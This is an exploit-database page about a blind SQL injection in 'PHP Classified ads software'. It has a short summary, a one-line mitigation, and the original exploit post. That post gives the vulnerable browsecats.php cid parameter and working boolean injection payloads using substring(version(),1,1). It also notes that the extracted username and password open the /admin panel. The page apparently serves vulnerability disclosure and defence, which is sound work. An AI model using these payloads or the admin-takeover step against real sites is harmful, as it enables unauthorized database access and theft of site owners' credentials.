header-logo
Suggest Exploit
vendor:
PHP Classified ads software
by:
BorN To K!LL - h4ck3r
7.5
CVSS
HIGH
Blind-Injection
89
CWE
Product Name: PHP Classified ads software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
n/a

PHP Classified ads software

The PHP Classified ads software is vulnerable to Blind-Injection. An attacker can exploit this vulnerability by sending a maliciously crafted request to the browsecats.php page with a cid parameter. The attacker can then use the substring() function to determine the version of the software and gain access to the admin panel.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in database queries.
Source

Exploit-DB raw data:

==
[-]Author: BorN To K!LL - h4ck3r
[-]Contact: SQL@hotmail.co.uk
==
[-]Script: PHP Classified ads software
[-]Version: n/a
[-]Link: http://www.softbizsolutions.com/classified-ads-software.php
==
[-]3xploit:
[path]/browsecats.php?cid=[Blind-Injection]

[-]3xample:
[path]/browsecats.php?cid=2 and substring(version(),1,1)=4         // false ,,
[path]/browsecats.php?cid=2 and substring(version(),1,1)=5         // true ,,

[-]Note:
after getting the username and the password you can login to admin panel
[path]/admin
==
[-]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"